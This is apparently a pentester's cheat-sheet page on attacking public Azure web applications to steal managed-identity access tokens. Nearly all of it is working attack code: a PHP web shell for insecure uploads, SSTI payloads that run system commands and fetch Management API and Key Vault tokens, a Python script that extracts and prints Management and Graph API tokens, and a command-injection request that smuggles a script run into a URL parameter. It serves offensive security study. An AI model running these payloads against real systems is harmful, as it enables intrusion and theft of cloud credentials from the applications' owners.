🪴 Quartz 4.0

Search

SearchSearch

Abuse Public Web-Application

Apr 19, 20241 min read

Abuse Public Web-Application

Typically we try to gain some access tokens which can be found at an endpoint identified in the application’s system environment:

  • IDENTITY_ENDPOINT
  • IDENTITY_HEADER

insecure file upload

Upload a simple web command shell like:

<?php 
system($_REQUEST['cmd']);
?>

or directly try to steal a token, e.g., through:

<?php 
system('curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com/&api-version=2017-09-01" -H secret:$IDENTITY_HEADER');
?>

SSTI

entry fields for testing SSTI

{{ 7*7 }}
{{ config.items() }}
{{config.__class__.__init__.__globals__['os'].popen('whoami').read()}}
{{config.__class__.__init__.__globals__['os'].popen('env').read()}}
{{config.__class__.__init__.__globals__['os'].popen('curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com&api-version=2017-09-01" -H secret:$IDENTITY_HEADER').read()}}
 
# There is a special keyvault token:
{{config.__class__.__init__.__globals__['os'].popen('curl "$IDENTITY_ENDPOINT?resource=https://vault.azure.net&api-version=2017-09-01" -H secret:$IDENTITY_HEADER').read()}}

OS Command Injection

Use a simple command script that extracts the needed access tokens, e.g., in Python:

import os
import json
 
IDENTITY_ENDPOINT = os.environ['IDENTITY_ENDPOINT']
IDENTITY_HEADER = os.environ['IDENTITY_HEADER']
 
cmd = 'curl "%s?resource=https://management.azure.com/&api-version=2017-09-01" -H secret:%s' % (IDENTITY_ENDPOINT, IDENTITY_HEADER)
 
val = os.popen(cmd).read()
 
print("[+] Management API")
print("Access Token: "+json.loads(val)["access_token"])
print("ClientID: "+json.loads(val)["client_id"])
 
cmd = 'curl "%s?resource=https://graph.microsoft.com/&api-version=2017-09-01" -H secret:%s' % (IDENTITY_ENDPOINT, IDENTITY_HEADER)
 
val = os.popen(cmd).read()
print("\r\n[+] Graph API")
print("Access Token: "+json.loads(val)["access_token"])
print("ClientID: "+json.loads(val)["client_id"])
  • dont forget the second ; cmd ; when calling it (depends upon the web application):
(Invoke-WebRequest -UseBasicParsing -Uri "https://processfile.azurewebsites.net/api/HttpTrigger1?server=;python /tmp/uploads/student64/student64.py;").Content

Graph View

Backlinks